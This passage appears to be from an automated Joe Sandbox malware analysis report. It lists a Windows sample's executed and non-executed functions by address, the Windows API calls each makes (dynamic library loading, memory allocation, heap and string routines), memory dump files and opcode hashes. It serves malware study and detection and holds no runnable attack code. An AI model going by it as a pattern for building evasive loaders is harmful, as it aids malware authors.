                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1699248803-0
                                                                                                                                                                                                                                                  • Opcode ID: ab4a8321712fcc922be74a85797a0249bd995a8b6693096a5be71d41bf5f0982
                                                                                                                                                                                                                                                  • Instruction ID: 2708b0e3243a0e957b98e2de8dbff298e4be506c05b60b3b5688325687bc23d0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab4a8321712fcc922be74a85797a0249bd995a8b6693096a5be71d41bf5f0982
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22F065F56042406FE3109B29DC84D7BBBECEBC8755F00882CF9C897341D6349D15C6A1
                                                                                                                                                                                                                                                  Function 00414AB3 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,?,?,00401F5C,?,00000000,?,0042EEFC), ref: 00414AC8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                  • Opcode ID: e7eeef91b189e3eb156169286097dafbbf83a662e1d22db4b58308e2dade1027
                                                                                                                                                                                                                                                  • Instruction ID: 9a9555821b1b5639991f33a0d047dc28d6ef73e7f338c8467c625410a53c9249
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7eeef91b189e3eb156169286097dafbbf83a662e1d22db4b58308e2dade1027
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8D0A7BB70172A4B5B006EAA1C55CCF530EEFC029A301043FF50093150CA145E0A46A5
                                                                                                                                                                                                                                                  Function 00AD4C99 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00AD4CEA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3467949827.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ad0000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                  • Instruction ID: 0a7287f6fd117fa152802432975dfd7149ed84c5eda706af19c1e4d04c21958b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0113C79A00208EFDB01DF98CA85E98BBF5EF08751F058095F9489B362D371EA50DF80
                                                                                                                                                                                                                                                  Function 00414B34 Relevance: 1.3, APIs: 1, Instructions: 28memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,0040B194,?,?,?,?,?,?,?), ref: 00414B4F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3494564517-0
                                                                                                                                                                                                                                                  • Opcode ID: 0c83796e71d9fd92b85acab00c076ac88b98b03ee52731056f74553e5987f3df
                                                                                                                                                                                                                                                  • Instruction ID: c5585fe1be56caf24d44a51d4f7cb6acd98d7c2f993cc92adb08f3e4ce33ffd0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c83796e71d9fd92b85acab00c076ac88b98b03ee52731056f74553e5987f3df
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61E0D87630D3924B97608EA854C0FA7A79CABD9F41B0A006EFA44D7301D650EC45C778

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 00B1C858 Relevance: 119.6, APIs: 67, Strings: 1, Instructions: 649libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,?,00000031,?,?,00B1B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 00B1CE10
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,00B1B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 00B1CE21
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,00B1B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 00B1CE32
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,00B1B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 00B1CE43
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,00B1B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 00B1CE54
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,00B1B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 00B1CE65
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,00B1B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 00B1CE76
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,00B1B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 00B1CE87
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FE4), ref: 00B1CEDD
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1CEF4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1CF0B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1CF22
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1CF39
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FE8), ref: 00B1CF58
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1CF6F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1CF86
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1CF9D
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1CFB4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1CFCB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1CFE2
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1CFF9
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FEC), ref: 00B1D014
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D02B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D042
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D059
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D070
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FF0), ref: 00B1D08F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D0A6
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D0BD
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D0D4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D0EB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D102
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FF8), ref: 00B1D121
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D138
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D14F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D166
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D17D
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D194
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D1AB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D1C2
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D1D9
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00645000), ref: 00B1D1F4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D20B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D222
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D239
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D250
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00645004), ref: 00B1D26B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D282
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00645008), ref: 00B1D29D
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D2B4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FF4), ref: 00B1D2D3
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D2EA
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D301
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D318
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D32F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D346
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D35D
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D374
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FFC), ref: 00B1D44B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D462
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D479
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D490
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00645014), ref: 00B1D4AB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00645018), ref: 00B1D4C6
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D4DD
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D4F4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00B1B2B7), ref: 00B1D50B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                  • String ID: B
                                                                                                                                                                                                                                                  • API String ID: 2238633743-3806887055
                                                                                                                                                                                                                                                  • Opcode ID: 68d40025ba20cdd3d247030dc32b72d75d51eb3007a989a3fac0a133a93af85d
                                                                                                                                                                                                                                                  • Instruction ID: b653fa4e455a2b1fb0e163693f5304113c86887857fbc6e94f93594329f84ce7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68d40025ba20cdd3d247030dc32b72d75d51eb3007a989a3fac0a133a93af85d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D62AE7D805640EFDB429F61FD46B643FE7FB4BB01B14716AE9028A272DB324864DB90
                                                                                                                                                                                                                                                  Function 00B10937 Relevance: 73.9, APIs: 49, Instructions: 421memorystringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00B107F6: lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B1083C
                                                                                                                                                                                                                                                    • Part of subcall function 00B107F6: strchr.MSVCRT ref: 00B10856
                                                                                                                                                                                                                                                    • Part of subcall function 00B107F6: strchr.MSVCRT ref: 00B1086E
                                                                                                                                                                                                                                                    • Part of subcall function 00B107F6: lstrlen.KERNEL32(?), ref: 00B10882
                                                                                                                                                                                                                                                    • Part of subcall function 00B107F6: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B1089A
                                                                                                                                                                                                                                                    • Part of subcall function 00B107F6: strcpy_s.MSVCRT ref: 00B10915
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?), ref: 00B10989
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 00B109A4
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?), ref: 00B109B0
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 00B109BB
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 00B109E3
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00B109ED
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?), ref: 00B109FD
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 00B10A19
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 00B10A25
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 00B10A30
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00B10A4B
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?), ref: 00B10A55
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 00B10A65
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 00B10A81
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00B10A91
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B10A9C
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?), ref: 00B10AAF
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?), ref: 00B10AB9
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 00B10ADA
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00B10AE4
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?), ref: 00B10AF4
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 00B10B12
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 00B10B1E
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00644E40,?,?,?,?,?,?), ref: 00B10B28
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 00B10B2F
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 00B10B42
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00B10B79
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 00B10BB1
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 00B10BC9
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?), ref: 00B10BD4
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?), ref: 00B10BDB
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 00B10BEE
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 00B10C07
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B10C0F
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B10C1A
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B10C45
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B10C4F
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B10C5F
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 00B10C7B
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B10C87
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00644E40), ref: 00B10C92
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?), ref: 00B10D35
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00B10D3F
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?), ref: 00B10D76
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 00B10D83
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00644E40,?,?,?), ref: 00B10D8D
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 00B10DD6
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 00B10DE1
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 00B10E16
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$Process$Free$strcpy_s$lstrlen$strchr$memcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3553499935-0
                                                                                                                                                                                                                                                  • Opcode ID: 975215ca6a6fb4d5367f80fe5ca197d0c8580447b4b488d64dec9b9a6ed5d922
                                                                                                                                                                                                                                                  • Instruction ID: 3e62d61d999a86d7c1381329313da9ca2ab1081fb490413fc3a282af3c36285a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 975215ca6a6fb4d5367f80fe5ca197d0c8580447b4b488d64dec9b9a6ed5d922
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3FE17AB5504314AFD720AFA5AC49B6BBBEDFF89740F404879F845C7241DBB0AD448BA2
                                                                                                                                                                                                                                                  Function 00402BEB Relevance: 35.1, Strings: 28, Instructions: 135COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
